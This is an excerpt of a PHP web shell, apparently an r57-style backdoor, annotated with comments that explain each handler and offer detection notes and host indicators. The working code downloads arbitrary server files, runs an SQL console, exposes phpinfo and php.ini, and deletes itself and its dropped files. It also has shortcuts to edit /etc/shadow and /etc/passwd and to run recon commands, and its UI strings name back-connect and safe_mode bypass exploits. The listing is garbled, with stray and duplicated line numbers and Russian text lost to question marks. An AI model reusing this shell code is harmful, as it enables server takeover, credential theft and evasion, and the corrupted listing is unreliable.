 $this->dump[] = $this->rows[0]['Create Table'];
 $this->dump[] = '## --------------------------------------- ';
 if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
 if(!$this->get_result()) return 0;
 for($i=0;$i<$this->num_rows;$i++)
 {
 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
 $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 }
 break;
 case 'MSSQL':
 $this->dump[0] = '## MSSQL dump';
 if($this->query('SELECT * FROM '.$table)!=1) return 0;
 if(!$this->get_result()) return 0;
 for($i=0;$i<$this->num_rows;$i++)
 {
 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 }
 break;
 case 'PostgreSQL':
 $this->dump[0] = '## PostgreSQL dump';
 if($this->query('SELECT * FROM '.$table)!=1) return 0;
 if(!$this->get_result()) return 0;
 for($i=0;$i<$this->num_rows;$i++)
 {
 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 }
 break;
 case 'Oracle':
 $this->dump[0] = '## ORACLE dump';
 if($this->query('SELECT * FROM '.$table)!=1) return 0;
 if(!$this->get_result()) return 0;
 for($i=0;$i<$this->num_rows;$i++)
 {
 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 }
 break;
 case 'MySQLi':
 $this->dump[0] = '## MySQLi dump';
 if($this->query('SELECT * FROM '.$table)!=1) return 0;
 if(!$this->get_result()) return 0;
 for($i=0;$i<$this->num_rows;$i++)
 {
 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);}
 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 }
 break;
 case 'mSQL':
 $this->dump[0] = '## mSQL dump';
 if($this->query('SELECT * FROM '.$table)!=1) return 0;
 if(!$this->get_result()) return 0;
 for($i=0;$i<$this->num_rows;$i++)
 {
 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 }
 break;
 case 'SQLite':
 $this->dump[0] = '## SQLite dump';
 if($this->query('SELECT * FROM '.$table)!=1) return 0;
 if(!$this->get_result()) return 0;
 for($i=0;$i<$this->num_rows;$i++)
 {
 foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
 $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 }
 break;
 default:
 return 0;
 break;
 }
 return 1;
 }

 /**
  * Closes the connection with the backend's close function; errors are silenced.
  */
 function close()
 {
 switch($this->db)
 {
 case 'MySQL':
 @mysql_close($this->connection);
 break;
 case 'MSSQL':
 @mssql_close($this->connection);
 break;
 case 'PostgreSQL':
 @pg_close($this->connection);
 break;
 case 'Oracle':
 @oci_close($this->connection);
 break;
 case 'MySQLi':
 @mysqli_close($this->connection);
 break;
 case 'mSQL':
 @msql_close($this->connection);
 break;
 case 'SQLite':
 @sqlite_close($this->connection);
 break;
 }
 }

 /**
  * Returns the backend's affected-row count for the last statement, passing
  * $this->res to the driver function; 0 for an unknown backend.
  *
  * @return mixed Driver return value, or 0.
  */
 function affected_rows()
 {
 switch($this->db)
 {
 case 'MySQL':
 return @mysql_affected_rows($this->res);
 break;
 case 'MSSQL':
 return @mssql_affected_rows($this->res);
 break;
 case 'PostgreSQL':
 return @pg_affected_rows($this->res);
 break;
 case 'Oracle':
 return @ocirowcount($this->res);
 break;
 case 'MySQLi':
 return @mysqli_affected_rows($this->res);
 break;
 case 'mSQL':
 return @msql_affected_rows($this->res);
 break;
 case 'SQLite':
 return @sqlite_changes($this->res);
 break;
 default:
 return 0;
 break;
 }
 }
 }
1567
// File download handler. Triggered by POST cmd=download_file with a non-empty
// d_name. The path in d_name is read as-is (no directory restriction) with
// moreread(), falling back to readzlib(); the content is optionally compressed
// according to POST 'compress' and returned as an attachment named after
// basename(d_name). On failure err() (defined elsewhere) is called and cmd is
// cleared so that nothing is sent.
// Impact: any file readable by the web-server account can be retrieved.
// Detection note: POST bodies containing cmd=download_file together with
// d_name, answered with a Content-disposition: attachment response from a
// script that normally serves HTML.
if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
 {
 if($file=moreread($_POST['d_name'])){ $filedump = $file; }
 else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; }
 if(!empty($_POST['cmd']))
 {
 // Discard anything already buffered so the response body is only the file.
 @ob_clean();
 $filename = @basename($_POST['d_name']);
 $content_encoding=$mime_type='';
 compress($filename,$filedump,$_POST['compress']);
 if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
 header("Content-type: ".$mime_type);
 header("Content-disposition: attachment; filename=\"".$filename."\";");
 echo $filedump;
 exit();
 }
 }
1601
// Information disclosure: a GET parameter named "1" prints the full phpinfo()
// page (PHP configuration, loaded modules, environment and server variables)
// followed by a BACK link, then stops.
// Detection note: requests of the form <script>?1 in access logs.
if(isset($_GET['1'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); }
1603
// SQL console handler. Triggered by POST cmd=db_query. Backend, host, port,
// user, password and database all come from the request (fields db, db_server,
// db_port, mysql_l, mysql_p, mysql_db), and the text in db_query is split on
// ';' and each piece longer than 5 characters is executed as its own statement.
// Results are rendered as HTML tables; the form is then re-emitted with the
// connection parameters, including the database password, in hidden fields
// built by in() (defined elsewhere).
// Impact: with credentials recovered from application config files, the
// operator can read or modify any database reachable from the web server.
// Detection notes: POST bodies containing cmd=db_query with the field names
// above; database-side, logins from the web host using accounts or queries the
// application itself never issues. The textarea's default text
// "SHOW DATABASES;\nSELECT * FROM user;" is a content signature.
if (isset($_POST['cmd']) && $_POST['cmd']=="db_query")
 {
 echo $head;
 $sql = new my_sql();
 $sql->db = $_POST['db'];
 $sql->host = $_POST['db_server'];
 $sql->port = $_POST['db_port'];
 $sql->user = $_POST['mysql_l'];
 $sql->pass = $_POST['mysql_p'];
 $sql->base = $_POST['mysql_db'];
 $querys = @explode(';',$_POST['db_query']);
 echo '<body bgcolor=#e4e0d8>';
 if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
 else
 {
 if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
 else
 {
 foreach($querys as $num=>$query)
 {
 if(strlen($query)>5)
 {
 echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
 // query() result code: 0 = error, 1 = result set, 2 = no result set.
 switch($sql->query($query))
 {
 case '0':
 echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
 break;
 case '1':
 if($sql->get_result())
 {
 echo "<table width=100%>";
 foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
 $keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", $sql->columns);
 echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
 for($i=0;$i<$sql->num_rows;$i++)
 {
 foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
 $values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]);
 echo '<tr><td><font face=Verdana size=-2> '.$values.' </font></td></tr>';
 }
 echo "</table>";
 }
 break;
 case '2':
 $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
 echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
 break;
 }
 }
 }
 }
 }
 // Re-emit the query form, carrying the connection parameters forward.
 echo "<br><form name=form method=POST>";
 echo in('hidden','db',0,$_POST['db']);
 echo in('hidden','db_server',0,$_POST['db_server']);
 echo in('hidden','db_port',0,$_POST['db_port']);
 echo in('hidden','mysql_l',0,$_POST['mysql_l']);
 echo in('hidden','mysql_p',0,$_POST['mysql_p']);
 echo in('hidden','mysql_db',0,$_POST['mysql_db']);
 echo in('hidden','cmd',0,'db_query');
 echo "<div align=center>";
 echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
 echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
 echo "</form>";
 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die();
 }
1737
// Self-removal: a request carrying the GET parameter "12" unlinks this very
// script (__FILE__). The '@' hides any failure, so nothing is reported to the
// caller or the error log from this call.
// For responders: once this has run the file is no longer on disk, so the
// web-server access log entry for the request is the remaining record of it.
1738if(isset($_GET['12']))
1739
1740 {
1741
1742 @unlink(__FILE__);
1743
1744 }
1745
// Artifact cleanup: the GET parameter "11" deletes nine fixed file names under
// $tempdir ($tempdir is assigned outside this excerpt). Errors for files that
// do not exist are suppressed with '@'.
// The names removed here (bdpl, back, bd, bd.c, dp, dpc, dpc.c, prxpl,
// grep.txt) are usable as host indicators when examining temporary
// directories on a server where this script was found.
1746if(isset($_GET['11']))
1747
1748 {
1749
1750 @unlink($tempdir.'bdpl');
1751
1752 @unlink($tempdir.'back');
1753
1754 @unlink($tempdir.'bd');
1755
1756 @unlink($tempdir.'bd.c');
1757
1758 @unlink($tempdir.'dp');
1759
1760 @unlink($tempdir.'dpc');
1761
1762 @unlink($tempdir.'dpc.c');
1763
1764 @unlink($tempdir.'prxpl');
1765
1766 // grep.txt is also the output file of the "locate"/"find" entries in $aliases
1767
1768 @unlink($tempdir.'grep.txt');
1769
1770 }
1769
1770if(isset($_GET['2']))
1771
1772{
1773
1774echo $head;
1775
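/**
 * Format one configuration value for display inside an HTML table cell.
 *
 * The previous version tested `$value == ''` first. Because false and null
 * both compare loosely equal to '', the boolean and NULL branches could never
 * be reached for those inputs. The checks are now strict and ordered so that
 * each type gets its own label.
 *
 * @param mixed $value Scalar, null, array or object to render.
 * @return string 'NULL', 'TRUE' or 'FALSE', '<i>no value</i>' for the empty
 *                string, otherwise the escaped and wrapped text produced by
 *                U_wordwrap() (arrays and objects are dumped with print_r()).
 */
function U_value($value)
{
    if ($value === null) {
        return 'NULL';
    }
    if (is_bool($value)) {
        return $value ? 'TRUE' : 'FALSE';
    }
    if ($value === '') {
        return '<i>no value</i>';
    }
    if (is_object($value)) {
        // Objects are shown through their property array.
        $value = (array) $value;
    }
    if (is_array($value)) {
        // print_r() can return its output directly; no output buffer needed.
        $value = print_r($value, true);
    }

    // U_wordwrap() HTML-escapes the text before it reaches the page.
    return U_wordwrap((string) $value);
}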
1805
/**
 * HTML-escape a string and insert a <wbr /> break hint every 100 characters.
 *
 * wordwrap() cuts by character count, so a hint can land inside an entity
 * such as "&lt;"; the final replacement moves such a hint to just after the
 * entity's closing ';'.
 *
 * @param string $str Raw text.
 * @return string Escaped text with break hints.
 */
function U_wordwrap($str)
{
    $escaped = @htmlspecialchars($str);
    $wrapped = @wordwrap($escaped, 100, '<wbr />', true);

    // "&l<wbr />t;" becomes "&lt;<wbr />"
    $splitEntity = '!(&[^;]*)<wbr />([^;]*;)!';

    return @preg_replace($splitEntity, '$1$2<wbr />', $wrapped);
}
1815
// Dumps every php.ini directive returned by ini_get_all() as a three-column
// HTML table: directive name, local value, master (global) value.
// Skipped entirely when ini_get_all() is not available.
1816if (@function_exists('ini_get_all'))
1817
1818 {
1819
1820 $r = '';
1821
1822 echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
1823
1824 foreach (@ini_get_all() as $key=>$value)
1825
1826 {
1827
1828 // Both values go through U_value(); $key is concatenated into the markup as-is.
 // ws() is defined outside this excerpt.
1828 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
1829
1830 }
1831
1832 echo $r;
1833
1834 echo '</table>';
1835
1836 }
1837
1838echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
1839
1840die();
1841
1842}
1843
// GET parameter "3": prints a two-column "CPU" table built from the lines of
// a file named "cpuinfo", then a BACK link, and ends the request with die().
// $head and ws() are defined outside this excerpt.
1844if(isset($_GET['3']))
1845
1846 {
1847
1848 echo $head;
1849
1850 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
1851
1852 // Relative path: resolved against the current working directory of the
 // PHP process, which this block does not set.
1852 $cpuf = @file("cpuinfo");
1853
1854 if($cpuf)
1855
1856 {
1857
1858 $c = @sizeof($cpuf);
1859
1860 for($i=0;$i<$c;$i++)
1861
1862 {
1863
1864 // Each line is split on ':' into a name and a value; an empty value is shown as "---".
 // A line without ':' yields no $info[1] element at all.
1864 $info = @explode(":",$cpuf[$i]);
1865
1866 if($info[1]==""){ $info[1]="---"; }
1867
1868 // $r is appended to without being initialised inside this block, and the
 // file text is written into the markup without htmlspecialchars().
1868 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
1869
1870 }
1871
1872 echo $r;
1873
1874 }
1875
1876 else
1877
1878 {
1879
1880 // File missing, unreadable or empty: a single "---" row.
1880 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
1881
1882 }
1883
1884 echo '</table>';
1885
1886 // $_SERVER['PHP_SELF'] is placed into the href attribute unescaped.
1886 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
1887
1888 die();
1889
1890 }
1891
// GET parameter "4": same layout as the CPU view, titled "MEMORY" and built
// from the lines of a file named "meminfo"; ends the request with die().
// $head and ws() are defined outside this excerpt.
1892if(isset($_GET['4']))
1893
1894 {
1895
1896 echo $head;
1897
1898 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
1899
1900 // Relative path: resolved against the current working directory of the
 // PHP process, which this block does not set.
1900 $memf = @file("meminfo");
1901
1902 if($memf)
1903
1904 {
1905
1906 $c = sizeof($memf);
1907
1908 for($i=0;$i<$c;$i++)
1909
1910 {
1911
1912 // Split "name: value"; unlike the CPU view, explode() is called without '@' here.
1912 $info = explode(":",$memf[$i]);
1913
1914 if($info[1]==""){ $info[1]="---"; }
1915
1916 // $r is appended to without being initialised inside this block, and the
 // file text is written into the markup without htmlspecialchars().
1916 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
1917
1918 }
1919
1920 echo $r;
1921
1922 }
1923
1924 else
1925
1926 {
1927
1928 // File missing, unreadable or empty: a single "---" row.
1928 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
1929
1930 }
1931
1932 echo '</table>';
1933
1934 // $_SERVER['PHP_SELF'] is placed into the href attribute unescaped.
1934 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
1935
1936 die();
1937
1938 }
1939
1940
1941
// Shortcut table: the presence of a numeric GET parameter (5-10, 13-34)
// overwrites $_POST['cmd'] with a fixed value and, for 'edit_file', also sets
// the target path in $_POST['e_name']. Only the key is tested with isset();
// its value is ignored. The code that acts on $_POST['cmd'] is outside this
// excerpt (presumably the command/file handlers further down; verify there).
// For log review: these actions arrive as bare query-string keys on a GET
// request, so the access log shows which shortcut was used even though the
// resulting command is placed into $_POST by the script itself. Keys 9 and 10
// map to /etc/shadow and /etc/passwd.
1942if(isset($_GET['5']))
1943
1944 {$_POST['cmd'] = 'systeminfo';}
1945
1946if(isset($_GET['6']))
1947
1948 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}
1949
1950if(isset($_GET['7']))
1951
1952 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}
1953
1954if(isset($_GET['8']))
1955
1956 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}
1957
1958if(isset($_GET['9']))
1959
1960 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}
1961
1962if(isset($_GET['10']))
1963
1964 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}
1965
// Keys 11 and 12 are handled earlier in the file (temp-file cleanup and self-removal).
1966if(isset($_GET['13']))
1967
1968 {$_POST['cmd']='cat /proc/cpuinfo';}
1969
1970if(isset($_GET['14']))
1971
1972 {$_POST['cmd']='cat /proc/version';}
1973
1974if(isset($_GET['15']))
1975
1976 {$_POST['cmd'] = 'free';}
1977
1978if(isset($_GET['16']))
1979
1980 {$_POST['cmd'] = 'dmesg(8)';}
1981
1982if(isset($_GET['17']))
1983
1984 {$_POST['cmd'] = 'vmstat';}
1985
1986if(isset($_GET['18']))
1987
1988 {$_POST['cmd'] = 'lspci';}
1989
1990if(isset($_GET['19']))
1991
1992 {$_POST['cmd'] = 'lsdev';}
1993
1994if(isset($_GET['20']))
1995
1996 {$_POST['cmd']='cat /proc/interrupts';}
1997
1998if(isset($_GET['21']))
1999
2000 {$_POST['cmd'] = 'cat /etc/*realise';}
2001
2002if(isset($_GET['22']))
2003
2004 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';}
2005
2006if(isset($_GET['23']))
2007
2008 {$_POST['cmd'] = 'lsattr -va';}
2009
// Keys 24-27: logged-in users, uptime and recent logins.
2010if(isset($_GET['24']))
2011
2012 {$_POST['cmd'] = 'w';}
2013
2014if(isset($_GET['25']))
2015
2016 {$_POST['cmd'] = 'who';}
2017
2018if(isset($_GET['26']))
2019
2020 {$_POST['cmd'] = 'uptime';}
2021
2022if(isset($_GET['27']))
2023
2024 {$_POST['cmd'] = 'last -n 10';}
2025
// Keys 28-31: processes, services and network state.
2026if(isset($_GET['28']))
2027
2028 {$_POST['cmd'] = 'ps -aux';}
2029
2030if(isset($_GET['29']))
2031
2032 {$_POST['cmd'] = 'service --status-all';}
2033
2034if(isset($_GET['30']))
2035
2036 {$_POST['cmd'] = 'ifconfig';}
2037
2038if(isset($_GET['31']))
2039
2040 {$_POST['cmd'] = 'netstat -a';}
2041
// Keys 32-34: mounts, partitions and disk usage.
2042if(isset($_GET['32']))
2043
2044 {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';}
2045
2046if(isset($_GET['33']))
2047
2048 {$_POST['cmd'] = 'fdisk -l';}
2049
2050if(isset($_GET['34']))
2051
2052 {$_POST['cmd'] = 'df -h';}
2053
2054
2055
2056#if(isset($_GET['']))
2057
2058# {$_POST['cmd'] = '';}
2059
2060
2061
// UI string table. Keys have the form '<language>_<kind><id>' with the
// languages 'ru' and 'eng' and the kinds 'butt' (button captions), 'text'
// (labels) and 'err' (messages); ids 27 and 77-79 are absent in both sets.
// Every 'ru_*' value below survives only as runs of '?': the Cyrillic text
// was presumably lost in a character-set conversion before this copy was
// made, so the Russian interface cannot be reconstructed from this listing.
// The intact 'eng_*' values name the script's functions (command execution,
// file upload/edit, port bind, back-connect, FTP and database brute force,
// safe_mode/open_basedir tests) and are fixed literals, which makes them
// usable for content-based detection of copies of this file.
2062$lang=array(
2063
2064'ru_butt1' =>'?????????',
2065
2066'ru_butt2' =>'?????????',
2067
2068'ru_butt3' =>'???????',
2069
2070'ru_butt4' =>'?????????',
2071
2072'ru_butt5' =>'?????????',
2073
2074'ru_butt6' =>'???????',
2075
2076'ru_butt7' =>'???????',
2077
2078'ru_butt8' =>'?????????',
2079
2080'ru_butt9' =>'????',
2081
2082'ru_butt10'=>'?????????',
2083
2084'ru_butt11'=>'?????????????',
2085
2086'ru_butt12'=>'?????',
2087
2088'ru_butt13'=>'???????/???????',
2089
2090'ru_butt14'=>'???????',
2091
2092'ru_butt15'=>'?????????',
2093
2094'ru_text1' =>'??????????? ???????',
2095
2096'ru_text2' =>'?????????? ?????? ?? ???????',
2097
2098'ru_text3' =>'????????? ???????',
2099
2100'ru_text4' =>'??????? ??????????',
2101
2102'ru_text5' =>'???????? ?????? ?? ??????',
2103
2104'ru_text6' =>'????????? ????',
2105
2106'ru_text7' =>'??????',
2107
2108'ru_text8' =>'???????? ?????',
2109
2110'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
2111
2112'ru_text10'=>'??????? ????',
2113
2114'ru_text11'=>'?????? ??? ???????',
2115
2116'ru_text12'=>'back-connect',
2117
2118'ru_text13'=>'IP-?????',
2119
2120'ru_text14'=>'????',
2121
2122'ru_text15'=>'???????? ?????? ? ?????????? ???????',
2123
2124'ru_text16'=>'????????????',
2125
2126'ru_text17'=>'????????? ????',
2127
2128'ru_text18'=>'????????? ????',
2129
2130'ru_text19'=>'Exploits',
2131
2132'ru_text20'=>'????????????',
2133
2134'ru_text21'=>'????? ???',
2135
2136'ru_text22'=>'datapipe',
2137
2138'ru_text23'=>'????????? ????',
2139
2140'ru_text24'=>'????????? ????',
2141
2142'ru_text25'=>'????????? ????',
2143
2144'ru_text26'=>'????????????',
2145
2146'ru_text28'=>'?????? ? safe_mode',
2147
2148'ru_text29'=>'?????? ????????',
2149
2150'ru_text30'=>'???????? ?????',
2151
2152'ru_text31'=>'???? ?? ??????',
2153
2154'ru_text32'=>'?????????? PHP ????',
2155
2156'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL (PHP <= 4.4.2, 5.1.4)',
2157
2158'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
2159
2160'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
2161
2162'ru_text36'=>'???? . ???????',
2163
2164'ru_text37'=>'?????',
2165
2166'ru_text38'=>'??????',
2167
2168'ru_text39'=>'????',
2169
2170'ru_text40'=>'???? ??????? ???? ??????',
2171
2172'ru_text41'=>'????????? ? ?????',
2173
2174'ru_text42'=>'?????????????? ?????',
2175
2176'ru_text43'=>'????????????? ????',
2177
2178'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
2179
2180'ru_text45'=>'???? ????????',
2181
2182'ru_text46'=>'???????? phpinfo()',
2183
2184'ru_text47'=>'???????? ???????? php.ini',
2185
2186'ru_text48'=>'???????? ????????? ??????',
2187
2188'ru_text49'=>'???????? ??????? ? ???????',
2189
2190'ru_text50'=>'?????????? ? ??????????',
2191
2192'ru_text51'=>'?????????? ? ??????',
2193
2194'ru_text52'=>'????? ??? ??????',
2195
2196'ru_text53'=>'?????? ? ?????',
2197
2198'ru_text54'=>'????? ?????? ? ??????',
2199
2200'ru_text55'=>'?????? ? ??????',
2201
2202'ru_text56'=>'?????? ?? ???????',
2203
2204'ru_text57'=>'???????/??????? ????/??????????',
2205
2206'ru_text58'=>'???',
2207
2208'ru_text59'=>'????',
2209
2210'ru_text60'=>'??????????',
2211
2212'ru_text61'=>'???? ??????',
2213
2214'ru_text62'=>'?????????? ???????',
2215
2216'ru_text63'=>'???? ??????',
2217
2218'ru_text64'=>'?????????? ???????',
2219
2220'ru_text65'=>'???????',
2221
2222'ru_text66'=>'???????',
2223
2224'ru_text67'=>'Chown/Chgrp/Chmod',
2225
2226'ru_text68'=>'???????',
2227
2228'ru_text69'=>'????????1',
2229
2230'ru_text70'=>'????????2',
2231
2232'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
2233
2234'ru_text72'=>'????? ??? ??????',
2235
2236'ru_text73'=>'?????? ? ?????',
2237
2238'ru_text74'=>'?????? ? ??????',
2239
2240'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
2241
2242'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
2243
2244'ru_text80'=>'???',
2245
2246'ru_text81'=>'????',
2247
2248'ru_text82'=>'???? ??????',
2249
2250'ru_text83'=>'?????????? SQL ???????',
2251
2252'ru_text84'=>'SQL ??????',
2253
2254'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
2255
2256'ru_text86'=>'?????????? ????? ? ???????',
2257
2258'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
2259
2260'ru_text88'=>'??????:????',
2261
2262'ru_text89'=>'???? ?? ftp ???????',
2263
2264'ru_text90'=>'????? ????????',
2265
2266'ru_text91'=>'???????????? ?',
2267
2268'ru_text92'=>'??? ?????.',
2269
2270'ru_text93'=>'FTP',
2271
2272'ru_text94'=>'FTP-????????',
2273
2274'ru_text95'=>'?????? ?????????????',
2275
2276'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
2277
2278'ru_text97'=>'????????? ??????????: ',
2279
2280'ru_text98'=>'??????? ???????????: ',
2281
2282'ru_text99'=>'/etc/passwd',
2283
2284'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
2285
2286'ru_text101'=>'???????????? (user -> resu)',
2287
2288'ru_text102'=>'?????',
2289
2290'ru_text103'=>'???????? ??????',
2291
2292'ru_text104'=>'???????? ????? ?? ???????? ????',
2293
2294'ru_text105'=>'????',
2295
2296'ru_text106'=>'??',
2297
2298'ru_text107'=>'????',
2299
2300'ru_text108'=>'????? ??????',
2301
2302'ru_text109'=>'????????',
2303
2304'ru_text110'=>'??????????',
2305
2306'ru_text111'=>'SQL-?????? : ????',
2307
2308'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
2309
2310'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list() (PHP <= 5.1.2)',
2311
2312'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body() (PHP <= 5.1.2)',
2313
2314'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? [compress.zlib://] (PHP <= 4.4.2, 5.1.2)',
2315
2316'ru_text116'=>'?????????? ????',
2317
2318'ru_text117'=>'?',
2319
2320'ru_text118'=>'???? ??????????',
2321
2322'ru_text119'=>'?? ??????? ??????????? ????',
2323
2324'ru_text120'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? ini_restore() (PHP <= 4.4.4, 5.1.6) by NST',
2325
2326'ru_text121'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? fopen() (PHP v4.4.0 memory leak) by NST',
2327
2328'ru_text122'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? glob() (PHP <= 5.2.x)',
2329
2330'ru_text123'=>'???????? ??????????? ?????? ??????????? open_basedir, ?????? *.bzip ?????? [compress.bzip2://] (PHP <= 5.2.1)',
2331
2332'ru_text124'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ?????? ? error_log(php://) (PHP <= 5.1.4, 4.4.2)',
2333
2334'ru_text125'=>'??????',
2335
2336'ru_text126'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ?????? ? ???????[NULL-byte] (PHP <= 5.2.0)',
2337
2338'ru_text127'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ?????? ? readfile(php://) (PHP <= 5.2.1, 4.4.4)',
2339
2340'ru_text128'=>'???? ?????????/??????? ????? (touch)',
2341
2342'ru_text129'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ? fopen(srpath://) (PHP v5.2.0)',
2343
2344'ru_text130'=>'???????? ??????????? ?????? ??????????? open_basedir, ?????? *.zip ?????? [zip://] (PHP <= 5.2.1)',
